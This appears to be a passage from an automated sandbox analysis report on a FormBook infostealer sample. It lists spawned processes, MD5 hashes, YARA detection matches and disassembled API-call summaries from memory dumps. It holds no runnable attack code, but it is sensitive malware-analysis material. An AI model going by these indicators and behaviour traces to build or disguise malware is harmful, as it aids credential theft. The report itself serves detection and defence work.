                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4129587923.0000000002BE0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:17
                                              Start time:03:33:09
                                              Start date:08/07/2024
                                              Path:C:\Windows\SysWOW64\reg.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\reg.exe"
                                              Imagebase:0xa0000
                                              File size:59'392 bytes
                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4129728569.0000000003290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4129728569.0000000003290000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4129663108.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4129663108.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:false

                                              General

                                              Target ID:19
                                              Start time:03:33:14
                                              Start date:08/07/2024
                                              Path:C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe"
                                              Imagebase:0xef0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4129589579.0000000004730000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.4129589579.0000000004730000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:20
                                              Start time:03:33:19
                                              Start date:08/07/2024
                                              Path:C:\Windows\SysWOW64\reg.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\reg.exe"
                                              Imagebase:0xa0000
                                              File size:59'392 bytes
                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.1966905087.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.1966905087.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Has exited:true

                                              General

                                              Target ID:23
                                              Start time:03:33:22
                                              Start date:08/07/2024
                                              Path:C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe"
                                              Imagebase:0xef0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Has exited:false

                                              General

                                              Target ID:24
                                              Start time:03:33:34
                                              Start date:08/07/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff6bf500000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:8.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:97
                                                Total number of Limit Nodes:7
                                                execution_graph 18041 cd4668 18042 cd467a 18041->18042 18043 cd4686 18042->18043 18047 cd4779 18042->18047 18052 cd3e34 18043->18052 18045 cd46a5 18048 cd479d 18047->18048 18056 cd4879 18048->18056 18060 cd4888 18048->18060 18053 cd3e3f 18052->18053 18068 cd5c44 18053->18068 18055 cd7048 18055->18045 18058 cd48af 18056->18058 18057 cd498c 18057->18057 18058->18057 18064 cd44b4 18058->18064 18062 cd48af 18060->18062 18061 cd498c 18061->18061 18062->18061 18063 cd44b4 CreateActCtxA 18062->18063 18063->18061 18065 cd5918 CreateActCtxA 18064->18065 18067 cd59db 18065->18067 18069 cd5c4f 18068->18069 18072 cd5c64 18069->18072 18071 cd70ed 18071->18055 18073 cd5c6f 18072->18073 18076 cd5c94 18073->18076 18075 cd71c2 18075->18071 18077 cd5c9f 18076->18077 18080 cd5cc4 18077->18080 18079 cd72c5 18079->18075 18081 cd5ccf 18080->18081 18083 cd85cb 18081->18083 18087 cdac79 18081->18087 18082 cd8609 18082->18079 18083->18082 18091 cdcd77 18083->18091 18096 cdcd68 18083->18096 18102 cdaca0 18087->18102 18106 cdacb0 18087->18106 18088 cdac8e 18088->18083 18092 cdcd99 18091->18092 18093 cdcdbd 18092->18093 18129 cdcf28 18092->18129 18133 cdcee5 18092->18133 18093->18082 18097 cdcd1b 18096->18097 18098 cdcd6e 18096->18098 18097->18082 18099 cdcf28 2 API calls 18098->18099 18100 cdcee5 2 API calls 18098->18100 18101 cdce00 18098->18101 18099->18101 18100->18101 18101->18082 18103 cdacb0 18102->18103 18109 cdada8 18103->18109 18104 cdacbf 18104->18088 18108 cdada8 2 API calls 18106->18108 18107 cdacbf 18107->18088 18108->18107 18110 cdadb9 18109->18110 18111 cdaddc 18109->18111 18110->18111 18117 cdb031 18110->18117 18121 cdb040 18110->18121 18111->18104 18112 cdadd4 18112->18111 18113 cdafe0 GetModuleHandleW 18112->18113 18114 cdb00d 18113->18114 18114->18104 18118 cdb054 18117->18118 18120 cdb079 18118->18120 18125 cda130 18118->18125 18120->18112 18122 cdb054 18121->18122 18123 cdb079 18122->18123 18124 cda130 LoadLibraryExW 18122->18124 18123->18112 18124->18123 18126 cdb220 LoadLibraryExW 18125->18126 18128 cdb299 18126->18128 18128->18120 18130 cdcf35 18129->18130 18131 cdcf6f 18130->18131 18137 cdbae0 18130->18137 18131->18093 18134 cdcf5d 18133->18134 18135 cdcf6f 18134->18135 18136 cdbae0 2 API calls 18134->18136 18135->18093 18136->18135 18138 cdbaeb 18137->18138 18140 cddc88 18138->18140 18141 cdd2dc 18138->18141 18140->18140 18142 cdd2e7 18141->18142 18143 cd5cc4 2 API calls 18142->18143 18144 cddcf7 18143->18144 18144->18140 18145 cdd040 18146 cdd086 GetCurrentProcess 18145->18146 18148 cdd0d8 GetCurrentThread 18146->18148 18149 cdd0d1 18146->18149 18150 cdd10e 18148->18150 18151 cdd115 GetCurrentProcess 18148->18151 18149->18148 18150->18151 18154 cdd14b 18151->18154 18152 cdd173 GetCurrentThreadId 18153 cdd1a4 18152->18153 18154->18152 18155 cdd690 DuplicateHandle 18156 cdd726 18155->18156 18157 7062038 18158 70621c3 18157->18158 18159 706205e 18157->18159 18159->18158 18162 70622b0 PostMessageW 18159->18162 18164 70622b8 PostMessageW 18159->18164 18163 7062324 18162->18163 18163->18159 18165 7062324 18164->18165 18165->18159

                                                Executed Functions

                                                Function 070614DA Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1723211453.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7060000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 547fe2c760792097f057b41ff75e6ddeb249286d7ebde9f7cf87bb0c089f8cda
                                                • Instruction ID: 912bcfd36f570a25b0b6cb1e0dc3db525a14d5ffc608999e3c69fb6a4ea15924
                                                • Opcode Fuzzy Hash: 547fe2c760792097f057b41ff75e6ddeb249286d7ebde9f7cf87bb0c089f8cda
                                                • Instruction Fuzzy Hash: E8213BB8819218CFCB60CF64C9587FCBBF8AB4A314F0462D6941EA3291D7359AC5CF00
                                                Function 00CDD031 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 294 cdd031-cdd0cf GetCurrentProcess 298 cdd0d8-cdd10c GetCurrentThread 294->298 299 cdd0d1-cdd0d7 294->299 300 cdd10e-cdd114 298->300 301 cdd115-cdd149 GetCurrentProcess 298->301 299->298 300->301 302 cdd14b-cdd151 301->302 303 cdd152-cdd16d call cdd618 301->303 302->303 307 cdd173-cdd1a2 GetCurrentThreadId 303->307 308 cdd1ab-cdd20d 307->308 309 cdd1a4-cdd1aa 307->309 309->308
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 00CDD0BE
                                                • GetCurrentThread.KERNEL32 ref: 00CDD0FB
                                                • GetCurrentProcess.KERNEL32 ref: 00CDD138
                                                • GetCurrentThreadId.KERNEL32 ref: 00CDD191
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: e754714fd34220ef103f846f87cb7767e6e26459f51b4b37752b412c66907729
                                                • Instruction ID: be5d5d8b68242cb6884cc1fb3bc2562839818ff7fd08bab5395ad11291068b10
                                                • Opcode Fuzzy Hash: e754714fd34220ef103f846f87cb7767e6e26459f51b4b37752b412c66907729
                                                • Instruction Fuzzy Hash: EC5187B0D00249CFDB04DFA9C548B9EBBF1EF88314F20845AE019A73A1D734A988CF65
                                                Function 00CDD040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 316 cdd040-cdd0cf GetCurrentProcess 320 cdd0d8-cdd10c GetCurrentThread 316->320 321 cdd0d1-cdd0d7 316->321 322 cdd10e-cdd114 320->322 323 cdd115-cdd149 GetCurrentProcess 320->323 321->320 322->323 324 cdd14b-cdd151 323->324 325 cdd152-cdd16d call cdd618 323->325 324->325 329 cdd173-cdd1a2 GetCurrentThreadId 325->329 330 cdd1ab-cdd20d 329->330 331 cdd1a4-cdd1aa 329->331 331->330
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 00CDD0BE
                                                • GetCurrentThread.KERNEL32 ref: 00CDD0FB
                                                • GetCurrentProcess.KERNEL32 ref: 00CDD138
                                                • GetCurrentThreadId.KERNEL32 ref: 00CDD191
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 528786e31734a73f416c70f81d51adddf3e4dc1ba3c943f1f601f2ac0c1d8e31
                                                • Instruction ID: 8d63c02b0f30ce62b4a63ed8ef202bbf55d34850b3796ed11c3626bd037dee98
                                                • Opcode Fuzzy Hash: 528786e31734a73f416c70f81d51adddf3e4dc1ba3c943f1f601f2ac0c1d8e31
                                                • Instruction Fuzzy Hash: 925155B0D002098FDB14DFA9D548BEEBBF1EF88314F20845AE519A7360D774A988CF65
                                                Function 00CDADA8 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 422 cdada8-cdadb7 423 cdadb9-cdadc6 call cda0cc 422->423 424 cdade3-cdade7 422->424 431 cdaddc 423->431 432 cdadc8 423->432 426 cdade9-cdadf3 424->426 427 cdadfb-cdae3c 424->427 426->427 433 cdae3e-cdae46 427->433 434 cdae49-cdae57 427->434 431->424 477 cdadce call cdb031 432->477 478 cdadce call cdb040 432->478 433->434 435 cdae59-cdae5e 434->435 436 cdae7b-cdae7d 434->436 438 cdae69 435->438 439 cdae60-cdae67 call cda0d8 435->439 441 cdae80-cdae87 436->441 437 cdadd4-cdadd6 437->431 440 cdaf18-cdafd8 437->440 443 cdae6b-cdae79 438->443 439->443 472 cdafda-cdafdd 440->472 473 cdafe0-cdb00b GetModuleHandleW 440->473 444 cdae89-cdae91 441->444 445 cdae94-cdae9b 441->445 443->441 444->445 446 cdae9d-cdaea5 445->446 447 cdaea8-cdaeaa call cda0e8 445->447 446->447 451 cdaeaf-cdaeb1 447->451 453 cdaebe-cdaec3 451->453 454 cdaeb3-cdaebb 451->454 455 cdaec5-cdaecc 453->455 456 cdaee1-cdaeee 453->456 454->453 455->456 458 cdaece-cdaede call cda0f8 call cda108 455->458 462 cdaf11-cdaf17 456->462 463 cdaef0-cdaf0e 456->463 458->456 463->462 472->473 474 cdb00d-cdb013 473->474 475 cdb014-cdb028 473->475 474->475 477->437 478->437
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00CDAFFE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 79f6ae9accf1f8a2bac123db2bbb11a014a24c0c357f42a4382deb1e0cdb4797
                                                • Instruction ID: dd54b45436a8219a3816f8a3e5f37ace2576c0db729329530859c9af9d9b57be
                                                • Opcode Fuzzy Hash: 79f6ae9accf1f8a2bac123db2bbb11a014a24c0c357f42a4382deb1e0cdb4797
                                                • Instruction Fuzzy Hash: E0814370A00B058FDB24DF2AD44579ABBF1BF88304F008A2ED59AD7B50D775EA49CB91
                                                Function 00CD590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 479 cd590c-cd59d9 CreateActCtxA 481 cd59db-cd59e1 479->481 482 cd59e2-cd5a3c 479->482 481->482 489 cd5a3e-cd5a41 482->489 490 cd5a4b-cd5a4f 482->490 489->490 491 cd5a51-cd5a5d 490->491 492 cd5a60 490->492 491->492 494 cd5a61 492->494 494->494
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00CD59C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 454e4e4aca79f2cb2d638e2a09ee041fe89fc0c4b1070cc37aa17420857a049f
                                                • Instruction ID: c1954ee911789e4a0bd271a6eec48acf129721026207055ea67c0ae6b5d7b91e
                                                • Opcode Fuzzy Hash: 454e4e4aca79f2cb2d638e2a09ee041fe89fc0c4b1070cc37aa17420857a049f
                                                • Instruction Fuzzy Hash: 4241E2B0C00719CFDB24CFA9C884BDEBBB5BF49304F24816AD419AB255DB75694ACF90
                                                Function 00CD44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 495 cd44b4-cd59d9 CreateActCtxA 498 cd59db-cd59e1 495->498 499 cd59e2-cd5a3c 495->499 498->499 506 cd5a3e-cd5a41 499->506 507 cd5a4b-cd5a4f 499->507 506->507 508 cd5a51-cd5a5d 507->508 509 cd5a60 507->509 508->509 511 cd5a61 509->511 511->511
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00CD59C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: bac4b53b930cc9f78a6e7d757ab6a088bccf4948a0ac3acb866a9d20dfdb3714
                                                • Instruction ID: f9b0188db01ced1eb7d10aa4503abe3070fd5d4fef04893f470afac3127f3256
                                                • Opcode Fuzzy Hash: bac4b53b930cc9f78a6e7d757ab6a088bccf4948a0ac3acb866a9d20dfdb3714
                                                • Instruction Fuzzy Hash: 4B41DFB0C0061DCFDB24CFAAC984B9EBBB5BF48304F24816AD509AB255DB756946CF90
                                                Function 00CDD689 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 512 cdd689-cdd724 DuplicateHandle 513 cdd72d-cdd74a 512->513 514 cdd726-cdd72c 512->514 514->513
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CDD717
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 6458254b24c19075776153c623ed0424a6286e5688c73a386c63994a48d91de6
                                                • Instruction ID: 0e63b0c44f35e18a53ad864f35257a600c6424a12eba0df0c1d4d813d4c47c9a
                                                • Opcode Fuzzy Hash: 6458254b24c19075776153c623ed0424a6286e5688c73a386c63994a48d91de6
                                                • Instruction Fuzzy Hash: 7C21E2B5D00259DFDB10CFAAD984ADEBBF5EB48324F14801AE919B3310D374A940CFA4
                                                Function 00CDD690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 517 cdd690-cdd724 DuplicateHandle 518 cdd72d-cdd74a 517->518 519 cdd726-cdd72c 517->519 519->518
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CDD717
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 2693e528e1a76ebb0f99448256675238f59eef4a16456e6ba9203ad945002db4
                                                • Instruction ID: 7ad302283ecd9ae82b3e42d54b40134ac3f81d43e91cbb2260a7acdd02188faa
                                                • Opcode Fuzzy Hash: 2693e528e1a76ebb0f99448256675238f59eef4a16456e6ba9203ad945002db4
                                                • Instruction Fuzzy Hash: 0D21E2B5D002489FDB10CFAAD984ADEFFF8EB48320F14801AE919A3310C374A940CFA4
                                                Function 00CDA130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 522 cda130-cdb260 524 cdb268-cdb297 LoadLibraryExW 522->524 525 cdb262-cdb265 522->525 526 cdb299-cdb29f 524->526 527 cdb2a0-cdb2bd 524->527 525->524 526->527
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00CDB079,00000800,00000000,00000000), ref: 00CDB28A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 33fb3472d9191c8e39d356c76b0722b814e369d00f662a134db183724bd31c74
                                                • Instruction ID: 05f76c11de40fe829551162101a40e810fbbfb38bf7b6634496b603355cfd3b3
                                                • Opcode Fuzzy Hash: 33fb3472d9191c8e39d356c76b0722b814e369d00f662a134db183724bd31c74
                                                • Instruction Fuzzy Hash: 5411E4B6900209DFDB14CF9AD444ADEFBF4EB48310F11852ED519A7350C375A945CFA5
                                                Function 00CDB218 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 530 cdb218-cdb260 531 cdb268-cdb297 LoadLibraryExW 530->531 532 cdb262-cdb265 530->532 533 cdb299-cdb29f 531->533 534 cdb2a0-cdb2bd 531->534 532->531 533->534
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00CDB079,00000800,00000000,00000000), ref: 00CDB28A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f7373bed1f69b403f0cf180a08ddfe9f9a82233594e69398850ccb99c9590a0e
                                                • Instruction ID: 484dd5ecce6b493d4cc14312558cd43dc0adceec1b387c5572b518ce5efe1597
                                                • Opcode Fuzzy Hash: f7373bed1f69b403f0cf180a08ddfe9f9a82233594e69398850ccb99c9590a0e
                                                • Instruction Fuzzy Hash: 7E1126B6C00249CFCB14CF9AC444ADEFBF4EB88310F15852AD919A7310C375A945CFA4
                                                Function 00CDAF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 537 cdaf98-cdafd8 538 cdafda-cdafdd 537->538 539 cdafe0-cdb00b GetModuleHandleW 537->539 538->539 540 cdb00d-cdb013 539->540 541 cdb014-cdb028 539->541 540->541
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00CDAFFE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: bdae557b576eee1034eb04b7d68187d85931a310afcb233c36542ce9446572fb
                                                • Instruction ID: 3e5adedfa6c1fed86d3c13a36a71925d07b5972fa9a067f0e3e62362f026b3cd
                                                • Opcode Fuzzy Hash: bdae557b576eee1034eb04b7d68187d85931a310afcb233c36542ce9446572fb
                                                • Instruction Fuzzy Hash: 2E11E0B5C00249CFCB14CF9AC444ADEFBF4EB88324F10856AD969A7710D375AA45CFA5
                                                Function 070622B0 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 543 70622b0-7062322 PostMessageW 544 7062324-706232a 543->544 545 706232b-706233f 543->545 544->545
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 07062315
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1723211453.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7060000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: c491785d17ee7ac2747da85678ad315435b4e92eea9b242d555ac597f4169ff6
                                                • Instruction ID: c7215e9ae9390a5a26baafb725647bef9daabcb4118986fe4538a0eaa82e97a2
                                                • Opcode Fuzzy Hash: c491785d17ee7ac2747da85678ad315435b4e92eea9b242d555ac597f4169ff6
                                                • Instruction Fuzzy Hash: 4C11F2B58003599FCB10CF99C888BDEFFF4EB48324F24891AE458A7610C375A984CFA4
                                                Function 070622B8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 07062315
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1723211453.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7060000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: b16a4337c29f7cfe6e30113363594eb65bda55237fc8cd247eba31fa3294fa68
                                                • Instruction ID: d36c21407dbc067e2ebcba60310536ce10915338a33aa42116687d04a5af8d17
                                                • Opcode Fuzzy Hash: b16a4337c29f7cfe6e30113363594eb65bda55237fc8cd247eba31fa3294fa68
                                                • Instruction Fuzzy Hash: 6E11C2B58002599FDB10DF9AC449BDEFBF8EB48324F108519D558A7610C375A944CFA5
                                                Function 0096D3D8 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1696791377.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_96d000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 985fc2b458808a0f1e8c6117f337e97fedf81192ada02ffd163c85a5dc2c32e6
                                                • Instruction ID: 24092225107c38534425f996870c367db5ec760e93b4969f6ce84f10e28e3dd7
                                                • Opcode Fuzzy Hash: 985fc2b458808a0f1e8c6117f337e97fedf81192ada02ffd163c85a5dc2c32e6
                                                • Instruction Fuzzy Hash: B5212871A00244DFDB05DF14DAC0F26BF69FB98314F24C569D9094B2A6C73AEC56C6A1
                                                Function 0097D1D4 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1696831761.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_97d000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 93d7a5e11201edb2478f8e9487874a90f232ba2bda39689c567bae6de586e6f2
                                                • Instruction ID: 14364d5e1f4d44e3c81f5eafdd67e15d66d5769a37ffbb4759639097fc24fe84
                                                • Opcode Fuzzy Hash: 93d7a5e11201edb2478f8e9487874a90f232ba2bda39689c567bae6de586e6f2
                                                • Instruction Fuzzy Hash: 5F21D072604200EFDB05DF14D980B26BBB5FF84314F24CAA9E94D4B296C33AD846CA61
                                                Function 0097D01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1696831761.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                Joe Sandbox IDA Plugin
